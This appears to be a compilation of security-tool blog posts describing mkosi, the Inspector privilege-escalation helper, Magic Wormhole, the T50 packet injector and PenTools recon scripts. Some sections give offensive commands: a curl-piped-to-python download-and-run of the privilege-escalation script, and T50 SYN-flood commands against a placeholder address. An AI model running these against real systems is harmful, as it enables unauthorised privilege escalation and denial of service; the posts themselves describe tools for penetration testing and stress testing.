mkosi is definitely a tool with a focus on developer’s needs for building OS images, for testing and debugging, but also for generating production images with cryptographic protection. A typical use-case would be to add a mkosi.default file to an existing project (for example, one written in C or Python), thus making it easy to generate an OS image for it. mkosi will put together the image with development headers and tools, compile your code in it, run your test suite, then throw away the image again, and build a new one, this time without development headers and tools, and install your build artifacts in it. This final image is then “production-ready”, and only contains your built program and the minimal set of packages you configured otherwise. Such an image could then be deployed with casync (or any other tool of course) to be delivered to your set of servers, or IoT devices or whatever you are building.

mkosi is supposed to be legacy-free: the focus is clearly on today’s technology, not yesteryear’s. Specifically this means that we’ll generate GPT partition tables, not MBR/DOS ones. When you tell mkosi to generate a bootable image for you, it will make it bootable on EFI, not on legacy BIOS. The GPT images generated follow specifications such as the Discoverable Partitions Specification, so that /etc/fstab can remain unpopulated and tools such as systemd-nspawn can automatically dissect the image and boot from it.

 

Supported output formats

The following output formats are supported:

  • Raw GPT disk image, with ext4 as root (raw_gpt)
  • Raw GPT disk image, with btrfs as root (raw_btrfs)
  • Raw GPT disk image, with squashfs as read-only root (raw_squashfs)
  • Plain directory, containing the OS tree (directory)
  • btrfs subvolume, with separate subvolumes for /var, /home, /srv and /var/tmp (subvolume)
  • Tarball (tar)

When a GPT disk image is created, the following additional options are available:

  • A swap partition may be added in
  • The image may be made bootable on EFI systems
  • Separate partitions for /srv and /home may be added in
  • The root, /srv and /home partitions may optionally be encrypted with LUKS.
  • A dm-verity partition may be added in that adds runtime integrity data for the root partition

 

Compatibility

Generated images are legacy-free. This means only GPT disk labels (and no MBR disk labels) are supported, and only systemd based images may be generated. Moreover, for bootable images only EFI systems are supported (not plain MBR/BIOS).

All generated GPT disk images may be booted in a local container directly with:

systemd-nspawn -bi image.raw

Additionally, bootable GPT disk images (as created with the --bootable flag) work when booted directly by EFI systems, for example in KVM via:

qemu-kvm -m 512 -smp 2 -bios /usr/share/edk2/ovmf/OVMF_CODE.fd -drive format=raw,file=image.raw

EFI bootable GPT images are larger than plain GPT images, as they additionally carry an EFI system partition containing a boot loader, as well as a kernel, kernel modules, udev and more.

All directory or btrfs subvolume images may be booted directly with:

systemd-nspawn -bD image


Other features

  • Optionally, create a SHA256SUMS checksum file for the result, possibly even signed via gpg.
  • Optionally, place a specific .nspawn settings file along with the result.
  • Optionally, build a local project’s source tree in the image and add the result to the generated image (see below).
  • Optionally, share RPM/DEB package cache between multiple runs, in order to optimize build speeds.
  • Optionally, the resulting image may be compressed with XZ.
  • Optionally, btrfs’ read-only flag for the root subvolume may be set.
  • Optionally, btrfs’ compression may be enabled for all created subvolumes.
  • By default images are created without all files marked as documentation in the packages, on distributions where the package manager supports this. Use the --with-docs flag to build an image with docs added.

 

Supported distributions

Images may be created containing installations of the following OSes.

  • Fedora
  • Debian
  • Ubuntu
  • Arch Linux (incomplete)
  • openSUSE

In theory, any distribution may be used on the host for building images containing any other distribution, as long as the necessary tools are available. Specifically, any distro that packages debootstrap may be used to build Debian or Ubuntu images. Any distro that packages dnf may be used to build Fedora images. Any distro that packages pacstrap may be used to build Arch Linux images. Any distro that packages zypper may be used to build openSUSE images.

Currently, Fedora packages all four tools as of Fedora 26.

 

Files

To make it easy to build images for development versions of your projects, mkosi can read configuration data from the local directory, under the assumption that it is invoked from a source tree. Specifically, the following files are used if they exist in the local directory:

  • mkosi.default may be used to configure mkosi’s image building process. For example, you may configure the distribution to use (fedora, ubuntu, debian, archlinux) for the image, or additional distribution packages to install. Note that all options encoded in this configuration file may also be set on the command line, and this file is hence little more than a way to make sure simply typing mkosi without further parameters in your source tree is enough to get the right image of your choice set up. Additionally, if a mkosi.default.d directory exists, each file in it is loaded in the same manner, adding to or overriding the values specified in mkosi.default.
  • mkosi.extra may be a directory. If this exists all files contained in it are copied over the directory tree of the image after the OS was installed. This may be used to add in additional files to an image, on top of what the distribution includes in its packages.
  • mkosi.build may be an executable script. If it exists the image will be built twice: the first iteration will be the development image, the second iteration will be the final image. The development image is used to build the project in the current working directory (the source tree). For that the whole directory is copied into the image, along with the mkosi.build build script. The script is then invoked inside the image (via systemd-nspawn), with $SRCDIR pointing to the source tree. $DESTDIR points to a directory where the script should place any files it generates that should end up in the final image; a minimal sketch of such a script appears after this list. Note that make/automake based build systems generally honour $DESTDIR, thus making it very natural to build source trees from the build script. After the development image was built and the build script ran inside of it, it is removed again. After that the final image is built, without any source tree or build script copied in. However, this time the contents of $DESTDIR are added into the image.
  • mkosi.postinst may be an executable script. If it exists it is invoked as the last step of preparing an image, from within the image context. It is called once for the development image (if this is enabled, see above) with the “build” command line parameter, right before invoking the build script. It is called a second time for the final image with the “final” command line parameter, right before the image is considered complete. This script may be used to alter the images without any restrictions, after all software packages and built sources have been installed. Note that this script is executed directly in the image context with the final root directory in place, without any $SRCDIR/$DESTDIR setup.
  • mkosi.nspawn may be an nspawn settings file. If this exists it will be copied into the same place as the output image file. This is useful since nspawn looks for settings files next to image files it boots, for additional container runtime settings.
  • mkosi.cache may be a directory. If so, it is automatically used as package download cache, in order to speed repeated runs of the tool.
  • mkosi.passphrase may be a passphrase file to use when LUKS encryption is selected. It should contain the passphrase literally, and not end in a newline character (i.e. in the same format as cryptsetup and /etc/crypttab expect the passphrase files). The file must have an access mode of 0600 or less. If this file does not exist and encryption is requested the user is queried instead.
  • mkosi.secure-boot.crt and mkosi.secure-boot.key may contain an X509 certificate and PEM private key to use when UEFI SecureBoot support is enabled. All EFI binaries included in the image’s ESP are signed with this key, as a late step in the build process.

All these files are optional.
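
For illustration, a minimal mkosi.build script for an autotools-based project might look like the sketch below (an assumption-level example of the $SRCDIR/$DESTDIR contract described above, not taken from the mkosi documentation):

#!/bin/sh
# Build the copied-in source tree and install the artifacts into $DESTDIR,
# whose contents mkosi adds to the final image.
set -e
cd "$SRCDIR"
./configure --prefix=/usr
make
make DESTDIR="$DESTDIR" install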

Note that the location of all these files may also be configured during invocation via command line switches, and as settings in mkosi.default, in case the default settings are not acceptable for a project.

 

Requirements

mkosi is packaged for various distributions: Debian, Ubuntu, Arch (in AUR), Fedora. It is usually easiest to use the distribution package.

The current version requires systemd 233 (or actually, systemd-nspawn of it).

When not using distribution packages make sure to install the necessary dependencies. For example, on Fedora you need:

dnf install arch-install-scripts btrfs-progs debootstrap dosfstools edk2-ovmf squashfs-tools gnupg python3 tar veritysetup xz

Note that the minimum required Python version is 3.5.

If SecureBoot signing is to be used, then the “sbsign” tool needs to be installed as well, which is currently not available on Fedora, but in a COPR repository:

dnf copr enable msekleta/sbsigntool
dnf install sbsigntool

https://github.com/systemd/mkosi

 


Inspector – Privilege Escalation Unix Helper

Inspector is a python script that helps with privilege escalation in Linux environments. After starting, the script looks up the kernel version and checks whether a matching exploit exists, loads history files (bash, zsh, mysql, …), and lists the programs running as the root user.

Download on server

wget https://raw.githubusercontent.com/graniet/Inspector/master/inspector.py

Execute Inspector

python inspector.py

Or download & execute

curl https://raw.githubusercontent.com/graniet/Inspector/master/inspector.py | python

 


Magic Wormhole – Get Things From One Computer To Another, Safely

This package provides a library and a command-line tool named wormhole, which makes it possible to get arbitrary-sized files and directories (or short pieces of text) from one computer to another. The two endpoints are identified by using identical “wormhole codes”: in general, the sending machine generates and displays the code, which must then be typed into the receiving machine.
The codes are short and human-pronounceable, using a phonetically-distinct wordlist. The receiving side offers tab-completion on the codewords, so usually only a few characters must be typed. Wormhole codes are single-use and do not need to be memorized.

Example
Sender:

% wormhole send README.md
Sending 7924 byte file named 'README.md'
On the other computer, please run: wormhole receive
Wormhole code is: 7-crossover-clockwork

Sending (<-10.0.1.43:58988)..
100%|=========================| 7.92K/7.92K [00:00<00:00, 6.02MB/s]
File sent.. waiting for confirmation
Confirmation received. Transfer complete.

Receiver:

% wormhole receive
Enter receive wormhole code: 7-crossover-clockwork
Receiving file (7924 bytes) into: README.md
ok? (y/n): y
Receiving (->tcp:10.0.1.43:58986)..
100%|===========================| 7.92K/7.92K [00:00<00:00, 120KB/s]
Received file written to README.md

Installation
$ pip install magic-wormhole

OS X
On OS X, you may need to install pip and run $ xcode-select --install to get GCC.
Or with homebrew:
$ brew install magic-wormhole

Linux
On Debian 9 and Ubuntu 17.04+ with apt:
$ sudo apt install magic-wormhole
On previous versions of the Debian/Ubuntu systems, or if you want to install the latest version, you may first need:
$ apt-get install python-pip build-essential python-dev libffi-dev libssl-dev
On Fedora:
$ dnf install python-pip python-devel libffi-devel openssl-devel gcc-c++ libtool redhat-rpm-config
Note: If you get errors like fatal error: sodium.h: No such file or directory on Linux, either use SODIUM_INSTALL=bundled pip install magic-wormhole, or try installing the libsodium-dev / libsodium-devel package. These work around a bug in pynacl which gets confused when the libsodium runtime is installed (e.g. libsodium13) but not the development package.

Windows
On Windows, python2 may work better than python3. On older systems, $ pip install --upgrade pip may be necessary to get a version that can compile all the dependencies.

Motivation

  • Moving a file to a friend’s machine, when the humans can speak to each other (directly) but the computers cannot
  • Delivering a properly-random password to a new user via the phone
  • Supplying an SSH public key for future login use

Copying files onto a USB stick requires physical proximity, and is uncomfortable for transferring long-term secrets because flash memory is hard to erase. Copying files with ssh/scp is fine, but requires previous arrangements and an account on the target machine, and how do you bootstrap the account? Copying files through email first requires transcribing an email address in the opposite direction, and is even worse for secrets, because email is unencrypted. Copying files through encrypted email requires bootstrapping a GPG key as well as an email address. Copying files through Dropbox is not secure against the Dropbox server and results in a large URL that must be transcribed. Using a URL shortener adds an extra step, reveals the full URL to the shortening service, and leaves a short URL that can be guessed by outsiders.
Many common use cases start with a human-mediated communication channel, such as IRC, IM, email, a phone call, or a face-to-face conversation. Some of these are basically secret, or are “secret enough” to last until the code is delivered and used. If this does not feel strong enough, users can turn on additional verification that doesn’t depend upon the secrecy of the channel.
The notion of a “magic wormhole” comes from the image of two distant wizards speaking the same enchanted phrase at the same time, and causing a mystical connection to pop into existence between them. The wizards then throw books into the wormhole and they fall out the other side. Transferring files securely should be that easy.


Design
The wormhole tool uses PAKE (“Password-Authenticated Key Exchange”), a family of cryptographic algorithms that uses a short low-entropy password to establish a strong high-entropy shared key. This key can then be used to encrypt data. wormhole uses the SPAKE2 algorithm, due to Abdalla and Pointcheval.
PAKE effectively trades off interaction against offline attacks. The only way for a network attacker to learn the shared key is to perform a man-in-the-middle attack during the initial connection attempt, and to correctly guess the code being used by both sides. Their chance of doing this is inversely proportional to the entropy of the wormhole code. The default is to use a 16-bit code (use --code-length= to change this), so for each use of the tool, an attacker gets a 1-in-65536 chance of success. As such, users can expect to see many error messages before the attacker has a reasonable chance of success.

Timing
The program does not have any built-in timeouts, however it is expected that both clients will be run within an hour or so of each other. This makes the tool most useful for people who are having a real-time conversation already, and want to graduate to a secure connection. Both clients must be left running until the transfer has finished.

Relays
The wormhole library requires a “Rendezvous Server”: a simple WebSocket-based relay that delivers messages from one client to another. This allows the wormhole codes to omit IP addresses and port numbers. The URL of a public server is baked into the library for use as a default, and will be freely available until volume or abuse makes it infeasible to support. Applications which desire more reliability can easily run their own relay and configure their clients to use it instead. Code for the Rendezvous Server is included in the library.
The file-transfer commands also use a “Transit Relay”, which is another simple server that glues together two inbound TCP connections and transfers data on each to the other. The wormhole send file mode shares the IP addresses of each client with the other (inside the encrypted message), and both clients first attempt to connect directly. If this fails, they fall back to using the transit relay. As before, the host/port of a public server is baked into the library, and should be sufficient to handle moderate traffic.
The protocol includes provisions to deliver notices and error messages to clients: if either relay must be shut down, these channels will be used to provide information about alternatives.
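For example, assuming a self-hosted Rendezvous Server and Transit Relay at relay.example.com (a hypothetical host; the URL and port formats here mirror the baked-in public defaults, so verify the option names against wormhole --help for your version), both clients would be invoked with matching options:

wormhole --relay-url ws://relay.example.com:4000/v1 --transit-helper tcp:relay.example.com:4001 send myfile.txt
wormhole --relay-url ws://relay.example.com:4000/v1 --transit-helper tcp:relay.example.com:4001 receive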

CLI tool

  • wormhole send [args] --text TEXT
  • wormhole send [args] FILENAME
  • wormhole send [args] DIRNAME
  • wormhole receive [args]

Both commands accept additional arguments to influence their behavior:

  • --code-length WORDS: use more or fewer than 2 words for the code
  • --verify: print (and ask the user to compare) an extra verification string
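A typical session looks roughly like this (output abridged and approximate; exact wording varies between versions). The sender runs:

wormhole send README.md
Sending 7924 byte file named 'README.md'
On the other computer, please run: wormhole receive
Wormhole code is: 7-crossover-clockwork

and the receiver types in the code when prompted:

wormhole receive
Enter receive wormhole code: 7-crossover-clockwork
Receiving file (7924 bytes) into: README.md
ok? (y/n): y
Received file written to README.md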

Library
The wormhole module makes it possible for other applications to use these code-protected channels. Twisted is supported today, and blocking/synchronous support is planned for the future. See docs/api.md for details.
The file-transfer tools use a second module named wormhole.transit, which provides an encrypted record-pipe. It knows how to use the Transit Relay as well as direct connections, and attempts them all in parallel. TransitSender and TransitReceiver are distinct, although once the connection is established, data can flow in either direction. All data is encrypted (using nacl/libsodium "secretbox") with a key derived from the PAKE phase. See src/wormhole/cli/cmd_send.py for examples.
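A rough sketch of the Deferred-style library API follows (method names taken from recent versions' docs/api.md; the API has evolved over time, so treat this as an outline rather than a drop-in program — APPID is a made-up application identifier):

import wormhole
from twisted.internet.defer import inlineCallbacks
from twisted.internet.task import react

APPID = u"example.com/my-app"  # hypothetical application ID
RELAY = u"ws://relay.magic-wormhole.io:4000/v1"

@inlineCallbacks
def main(reactor):
    w = wormhole.create(APPID, RELAY, reactor)  # open a wormhole
    w.allocate_code()                 # ask the server for a fresh code
    code = yield w.get_code()
    print("wormhole code:", code)     # tell this code to the other side
    w.send_message(b"hello through the wormhole")
    reply = yield w.get_message()     # waits for the peer's encrypted message
    print("got:", reply)
    yield w.close()

react(main)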

Development
To set up Magic Wormhole for development, you will first need to install virtualenv.
Once you’ve done that, cd into the root of the repository and run:

virtualenv venv
source venv/bin/activate
pip install --upgrade pip setuptools

Now your virtualenv has been activated. You’ll want to re-run source venv/bin/activate for every new terminal session you open.
To install Magic Wormhole and its development dependencies into your virtualenv, run:

pip install -e .[dev]

Running Tests
Within your virtualenv, the command-line program trial will run the test suite:

trial wormhole

This tests the entire wormhole package. If you want to run only the tests for a specific module, or even just a specific test, you can specify it instead via Python’s standard dotted import notation, e.g.:

trial wormhole.test.test_cli.PregeneratedCode.test_file_tor

Developers can also just clone the source tree and run tox to run the unit tests on all supported (and installed) versions of Python: 2.7, 3.4, 3.5, and 3.6.

Troubleshooting
Every so often, you might get a traceback with the following kind of error:

pkg_resources.DistributionNotFound: The 'magic-wormhole==0.9.1-268.g66e0d86.dirty' distribution was not found and is required by the application

If this happens, run pip install -e .[dev] again.

The post Magic Wormhole – Get Things From One Computer To Another, Safely appeared first on DigitalMunition.

T50 – The Fastest Mixed Packet Injector Tool

T50 (f.k.a. F22 Raptor) is a high-performance mixed packet injector tool designed to perform Stress Testing.

The concept started in 2001, right after the release of ‘nb-isakmp.c‘, and the main goal was to have a tool to perform TCP/IP protocol fuzzing, covering common regular protocols such as ICMP, TCP, and UDP.

Why Stress Testing?

Why Stress Testing? Well, because when people design a new network infrastructure (e.g., a data center serving cloud computing), they think about:

  1. High-Availability
  2. Load Balancing
  3. Backup Sites (Cold Sites, Hot Sites, and Warm Sites)
  4. Disaster Recovery
  5. Data Redundancy
  6. Service Level Agreements

But almost nobody thinks about Stress Testing, or even performs any test to check how the network infrastructure behaves under stress, under overload, and under attack. Even during a Penetration Test, people prefer not to run any kind of Denial-of-Service testing. Even worse, they are missing one of the three key concepts of security that are common to risk management:

  • Confidentiality
  • Integrity
  • AVAILABILITY

T50 was designed to perform Stress Testing on a variety of network infrastructure devices (Version 2.45), using widely implemented protocols, and after some requests it was re-designed to extend the tests (as of Version 5.3), covering some regular protocols (ICMP, TCP and UDP), some infrastructure-specific protocols (GRE, IPSec and RSVP), and some routing protocols (RIP, EIGRP and OSPF).

Features

T50 is a powerful and unique packet injector tool, capable of sequentially sending the following fourteen protocols:

  1. ICMP – Internet Control Message Protocol
  2. IGMPv1 – Internet Group Management Protocol v1
  3. IGMPv3 – Internet Group Management Protocol v3
  4. TCP – Transmission Control Protocol
  5. EGP – Exterior Gateway Protocol
  6. UDP – User Datagram Protocol
  7. RIPv1 – Routing Information Protocol v1
  8. RIPv2 – Routing Information Protocol v2
  9. DCCP – Datagram Congestion Control Protocol
  10. RSVP – Resource ReSerVation Protocol
  11. GRE – Generic Routing Encapsulation
  12. IPSec – Internet Protocol Security (AH/ESP)
  13. EIGRP – Enhanced Interior Gateway Routing Protocol
  14. OSPF – Open Shortest Path First

It is the only tool capable of encapsulating the protocols listed above within Generic Routing Encapsulation (GRE).

It can also send an impressive number of packets per second, making it a second-to-none tool:

  • More than 1,000,000 pps of SYN Flood (+50% of the network uplink) in a 1000BASE-T Network (Gigabit Ethernet).
  • More than 120,000 pps of SYN Flood (+60% of the network uplink) in a 100BASE-TX Network (Fast Ethernet).

It can perform Stress Testing on a variety of network infrastructures, network devices, and deployed security solutions.

It can also simulate “Distributed Denial-of-Service” and “Denial-of-Service” attacks, validating firewall rules, router ACLs, and Intrusion Detection/Prevention System policies.

T50’s main differentiator is that it can send all of these protocols sequentially over one single socket; it can also be used to modify network routes, letting IT Security Professionals perform advanced Penetration Tests.
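For instance, a SYN flood against a lab host might look like the commands below (192.0.2.10 is a documentation-range placeholder address, and the option names follow commonly published T50 examples, so verify them against t50 --help for your build):

sudo t50 192.0.2.10 --flood --turbo -S --protocol TCP --dport 80

sudo t50 192.0.2.10 --flood --protocol T50

The first command floods TCP port 80 with SYN packets, forking an extra process for throughput; the second uses the special T50 protocol value to cycle through all fourteen protocols sequentially.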

You can download T50 here:

t50-v5.6.15.zip

Or read more here.

The post T50 – The Fastest Mixed Packet Injector Tool appeared first on DigitalMunition.

PenTools – Penetration Testing Tools Bundle

PenTools is a bundle of Python and Bash penetration testing tools for the recon and information-gathering stage of a penetration test or vulnerability assessment.

They are fairly simple scripts, but they may be interesting if you are new and want to see how such tasks are done, or how they can be automated using Python or Bash; a minimal example in that spirit appears after the feature list below.

Features

Tools included:

  • Mass DNS lookup
  • Mass reverse DNS lookup
  • DNS Enumerator
  • SMTP Username verification
  • Ping sweeper
  • DNS zone transfer information gatherer
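None of those scripts are reproduced here, but a mass DNS lookup in the same spirit takes only a few lines of Python (a minimal, hypothetical sketch, not PenTools’ actual code; it expects one hostname per line in hosts.txt):

#!/usr/bin/env python3
# Minimal mass-DNS-lookup sketch: resolve every hostname listed in a file.
import socket
import sys

def mass_lookup(path):
    with open(path) as f:
        for line in f:
            host = line.strip()
            if not host:
                continue  # skip blank lines
            try:
                print(f"{host} -> {socket.gethostbyname(host)}")
            except socket.gaierror as err:
                print(f"{host} -> lookup failed ({err})")

if __name__ == "__main__":
    mass_lookup(sys.argv[1] if len(sys.argv) > 1 else "hosts.txt")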

You can download PenTools here:

PenTools-master.zip

Or read more here.

The post PenTools – Penetration Testing Tools Bundle appeared first on DigitalMunition.
